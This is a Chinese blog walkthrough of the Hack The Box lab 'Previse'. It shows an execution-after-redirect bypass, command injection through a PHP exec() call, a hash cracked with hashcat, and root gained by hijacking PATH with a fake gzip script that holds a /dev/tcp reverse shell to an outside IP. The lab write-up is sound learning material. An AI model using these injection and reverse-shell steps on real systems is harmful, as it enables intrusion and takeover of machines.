【Hack The Box】linux练习-- Previse

于 2022-11-28 00:03:39 发布
阅读量590 收藏
点赞数
分类专栏: Hack The Box 文章标签: 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/128024955
版权

HTB 学习笔记

【Hack The Box】linux练习-- Previse

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu)

有价值的就这么两个

在这里插入图片描述
页面底部有一个
m4lwhere
可能是一个用户名
在这里插入图片描述
抓包分析的时候发现它不光返回302,还返回一个完整的页面

ear

这是 重定向后执行 (EAR) 漏洞 。 PHP 代码可能会检查会话,如果没有,则发送重定向。 这是来自 OWASP 页面的示例:

<?php if (!$loggedin) {
     print "<script>window.location = '/login';</script>\n\n"; 
} ?>

基于ear的重定向绕过

首先对bp进行设置,可以抓响应包
在这里插入图片描述在这里插入图片描述我把302 notfound改成200 ok(大写)

在这里插入图片描述
这个页面不是很有用,但它在那里。 顶部的链接指向另外四个页面:

帐户 ( /accounts.php)
文件 ( /files.php)
管理菜单 –> 网站状态 ( /status.php)
管理菜单 –> 日志数据 ( file_logs.php)

我试图添加一个用户

在这里插入图片描述
在这里插入图片描述这里同样是一个302,我们依旧可以修改成200来成功添加用户

而后可以不用bp了,正常登陆
而后来到files目录
在这里插入图片描述
有这个压缩包,点一下下载下来

源码分析

检索一下危险函数

grep -R -e system -e exec -e passthru -e '`' -e popen -e proc_open *

看到存在危险函数
在这里插入图片描述
出问题的源码(logs.php)

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
}
?>

可以看到
在将用户输入放入调用之前没有对用户输入进行清理 exec,这意味着我可以添加各种注入来执行,比如
; [command]和 $([command])

在这里插入图片描述我们选space模式,而后跟一个bash的反弹命令即可
用分号做隔断

在这里插入图片描述

www->

先建立一个稳定的shell

script /dev/null -c bash

在/var/www/html/config.php下找到了凭据
在这里插入图片描述

$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';

密码不能复用,我将在数据库寻找答案

mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'
show databases;
use previse;
show tables;
describe files;//描述一下这个表,防止太大了一下挤爆靶场

+-------------+--------------+------+-----+-------------------+----------------+
| Field       | Type         | Null | Key | Default           | Extra          |
+-------------+--------------+------+-----+-------------------+----------------+
| id          | int(11)      | NO   | PRI | NULL              | auto_increment |
| name        | varchar(255) | NO   |     | NULL              |                |
| size        | int(11)      | NO   |     | NULL              |                |
| user        | varchar(255) | YES  |     | NULL              |                |
| data        | blob         | YES  |     | NULL              |                |
| upload_time | datetime     | YES  |     | CURRENT_TIMESTAMP |                |
| protected   | tinyint(1)   | YES  |     | 0                 |                |
+-------------+--------------+------+-----+-------------------+----------------+

发现文件很大,所以不能直接select打开

select name,size,user,protected from files;

在这里插入图片描述再看下一个表

describe accounts;
select * from accounts;

+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | 0xdff    | $1$🧂llol$H.PGkFFp/y7qUAVKR4VKK1 | 2021-07-16 20:04:52 |
+----+----------+------------------------------------+---------------------+

得到了一组凭据

m4lwhere 
 $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

这为啥有个奶瓶?

hashcat -m 500 m4lwhere.hash /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

凭据如下

m4lwhere/ilovecody112235!

而后登陆m4lwhere用户
直接su即可
在这里插入图片描述sudo -l显示他可以执行那个backup脚本

在这里插入图片描述
cat打开看看

#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

在这里插入图片描述
看起来这个脚本有点问题,并且是个计划任务应该,因为他提到了cron
该脚本正在将日志备份到 /var/backups:

命令挟持

该脚本的漏洞在于 gzip在没有完整路径的情况下被调用。
在 /tmp我将创建一个名为 gzip的文件
生成一个反向 shell:

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.29/4444 0>&1

添加自制gzip到临时环境变量

export PATH=/tmp:$PATH

记得赋权

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hackthebox - Previse 靶场实战
路西菲尔的故事汇
08-09 1917
Hackthebox - Previse 靶场实战 靶场信息 靶场类型 信息搜集 使用nmap进行端口扫描 ┌──(root????root)-[~/Desktop] └─# nmap -A -sS -sC -sV -p- 10.10.11.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 22:27 CST Nmap scan report for 10.10.11.104 Host is up (0.25s latency). No
HackTheBox 简单盒子 之 Previse (一点TM不简单...)
rainrinser的博客
12-26 2192
Previse黑盒子重点: 1. php exec() 问题 2. unsanitized 用户输入 3. burp拦截给自己浏览器的回复 4. hashcat 5. path injection提权
hack the box-challenges:logger题解
zr1213159840的博客
05-06 620
题目给了一段usb的流量,让解析一下,找到答案。先下载下来,发现是一段pcap包。 直接双击,在wireshark中打开。 通览一下,发现是USB传输的相关信息,一通百度谷歌后,发现其中的HID data比较重要 这个HID data对应着传输的字符,具体的可以参考以下链接: https://wenku.baidu.com/view/9050c3c3af45b307e971971e.html 有了这个,那就好办很多了,我们通过检索,能发现应该是source为1.16.1的主机给destination
hack the box-challenges:No Place To Hide题解
zr1213159840的博客
05-31 325
RDP日志文件分析
hackthebox --Previse
weixin_47156475的博客
08-17 301
文章目录前言一、信息收集二、getshell三、提权总结 前言 前言就是,没有前言,啊哈哈哈,嘎嘎嘎嘎嘎嘎 一、信息收集 nmap扫描发现开放了22跟80端口,搜索了一下,没有找到可以利用的服务漏洞,也可能使我太菜了,接下来扫一下目录 发现一个accounts.php的重定向页面,尝试使用一些技巧访问因为这个页面因为这个页面可能跟账号有关,说不定可以得到一些账号密码,account的中文意思就是账号 然后修改返回的状态码为200 Ok 二、getshell 可以得到如下的页面: 注册一个
HackTheBox-Previse WP
h1nt的博客
09-07 530
0x01 信息收集 端口信息: 目录扫描: 0x02 打靶 在之前的收集信息中,可以发现有很多存在的页面,但是由于重定向跳回了login.php进行登录验证。 我们使用burp可以渲染页面,可以看到很多页面是有有用的信息的。 账户注册界面: 服务器状态浏览界面: 在文件浏览界面可以发现网站的源码: 也可以发现下载的链接,但是访问会跳回login.php进行登录验证,无奈只能先注册账户。 访问一开始的accounts.php,同时让burp拦截响应,将响应包状态码修改成2
HackTheBox | Previse
Purpose_7的博客
08-07 987
HackTheBox previse
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数据分析的核心技能和方法
07-19
数据分析的核心技能和方法
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包
07-19
毕业设计javajsp人寿保险销售网站(ssh)-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 平湖人寿保险公司保险销售网站分为用户和管理员两个部分 前台部分(用户界面): 1、资讯浏览功能: (1)新闻资讯浏览 (2)新闻资讯查询 (3)公司简介 (4)通知公告 2、用户登录注册功能: (1)注册 (2)登录 3、用户管理功能 (1)个人信息管理 (2)订单管理 4、保险购买功能: (1)保险产品浏览 (2)保险产品查询 (3)保险产品购买 后台管理(管理员界面) 1、管理员登录功能: 管理员在管理员登录界面输入用户名和密码,即可登录管理员的界面。 2、资讯管理功能: (1)新闻资讯管理 (2)公司简介管理 (3)通知公告管理 3、保险产品管理: (1)保险产品信息管理 (2)保险产品查询 4、会员管理: (1)会员删除 (2)会员级别管理 5、统计管理: (1)保险产品销售量统计 (2)有效会员数量统计 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程
毕业设计javajsp公共课考试系统(ssh)-qlkrp源码工具包
07-19
毕业设计javajsp公共课考试系统(ssh)-qlkrp源码工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 题库 试卷信息管理 阅卷 统计功能 包含:源码、数据库脚本、环境工具包、相同框架项目的安装教程(在说明文档中)
揭秘黑箱:YOLO预测结果的可解释性探究
07-19
YOLO(You Only Look Once)是一种流行的实时对象检测系统,最初由 Joseph Redmon 等人在 2015 年提出。它的核心思想是将对象检测任务视为一个回归问题,直接从图像像素到边界框坐标和类别概率的映射。YOLO 以其快速和高效而闻名,特别适合需要实时处理的应用场景。 以下是 YOLO 的一些关键特点: 1. **单次检测**:YOLO 模型在单次前向传播中同时预测多个对象的边界框和类别概率,不需要多次扫描图像。 2. **速度快**:YOLO 非常快速,能够在视频帧率下进行实时检测,适合移动设备和嵌入式系统。 3. **端到端训练**:YOLO 模型可以从原始图像直接训练到最终的检测结果,无需复杂的后处理步骤。 4. **易于集成**:YOLO 模型结构简单,易于与其他视觉任务(如图像分割、关键点检测等)结合使用。 5. **多尺度预测**:YOLO 可以通过多尺度预测来检测不同大小的对象,提高了检测的准确性。 YOLO 已经发展出多个版本,包括 YOLOv1、YOLOv2(也称为 YOLO9000)、YOLOv3、YOLOv4 和 YOLOv5 等。
吃鸡pubg适用于罗技GHUB的鼠标宏
07-19
安装步骤如下! 导入lua宏到GHUB的步骤如下: 1. 打开GHUB,选择你的罗技鼠标。 2. 转到“宏”选项卡,创建一个新的宏。 3. 在宏编辑器中,点击“导入”,选择"pubg1.lua"文件。 4. 宏会自动加载lua文件中的所有操作,你可以调整它们的顺序或延迟时间,以适应自己的游戏风格。 5. 将这个宏绑定到鼠标上的任意按键,就可以在游戏中使用了
基于海洋捕食者优化算法MPA-VMD实现信号去噪目标函数为包络信息熵 包络熵 排列熵 样本熵最小附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
工业控制系统安全测评指导书(二级)
最新发布
07-20
工业控制系统安全测评指导书(二级)
基于springboot+jsp的毕业生信息管理系统数据库表
07-19
设计一个毕业生信息管理系统,可实现管理员、辅导员、学生用户进行登录的系统,去除掉一些不必要的功能并添加一些新的功能使得页面更加简洁,用户可简单直接地进行操作该系统,并且更好地使用该系统,从而对毕业生的信息进行更好的管理。
高分项目-基于SpringBoot框架实现的旧物置换网站(包含全套源码 + 数据库sql + 论文).zip
07-19
高分项目-基于SpringBoot框架实现的旧物置换网站(包含全套源码 + 数据库sql + 论文)
基于Springboot的自习室管理和预约系统设计与实现论文
07-19
传统信息管理方式存在显著不足,首先耗时较长,其次数据错误率较高,且错误数据更正难度大,最后数据检索过程也颇为繁琐费力。因此,引入自习室管理和预约系统软件,旨在发挥其高效信息处理的能力,以优化信息管理流程,使管理工作更加系统化和程序化。同时,该系统的有效运用还能助力管理人员准确快速地处理信息。 在开发自习室管理和预约系统时,我们对于开发工具的选择尤为谨慎。为了便于开发与实现,我们选择了IDEA作为开发工具,并采用Mysql作为数据库工具。以此为基础搭建的开发环境,成功实现了自习室管理和预约系统的多项功能,包括管理员对用户和新闻公告的管理。 自习室管理和预约系统是一款基于软件开发技术精心打造的应用系统,它在信息处理方面展现出卓越的性能。无论是数据添加、数据维护与统计,还是数据查询等处理需求,该系统都能轻松胜任,展现出其强大的处理能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值